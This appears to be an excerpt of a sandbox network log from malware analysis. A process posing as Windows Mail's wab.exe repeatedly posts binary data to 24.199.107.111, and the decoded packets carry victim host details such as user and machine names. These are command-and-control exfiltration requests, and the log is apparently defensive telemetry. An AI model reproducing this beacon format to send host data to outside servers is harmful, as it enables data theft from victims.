                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:47.228303909 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:47.228317022 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.54976324.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:47.546902895 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:47.709314108 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:48.554845095 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:47 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:48.554877996 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:48.554894924 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.54976424.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:48.869529963 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:49.032088041 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:49.814682007 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:48 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:49.814714909 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:49.814729929 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.54976524.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:50.128905058 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:50.291285992 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:51.099504948 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:50 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:51.099534035 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:51.099550962 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.54976624.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:51.436031103 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:51.598176003 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:52.401158094 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:51 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
